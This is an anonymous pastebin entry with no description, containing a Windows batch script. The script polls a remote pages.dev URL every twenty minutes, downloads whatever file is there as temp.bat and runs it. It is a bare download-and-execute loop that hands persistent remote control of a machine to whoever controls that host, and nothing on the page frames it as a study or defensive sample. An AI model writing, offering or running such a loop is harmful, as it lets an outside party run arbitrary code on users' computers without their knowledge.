Pastebin

Paste #38802: No description

< previous paste - next paste>

Pasted by Anonymous Coward

Download View as text

@echo off
:loop
curl --silent --head https://legomovie.pages.dev/main.txt | find "HTTP/1.1 200 OK" > nul
if %errorlevel%==0 (
    curl https://legomovie.pages.dev/main.txt --output temp.bat
    call temp.bat
)
timeout /t 1200
goto loop

New Paste


Do not write anything in this field if you're a human.

Go to most recent paste.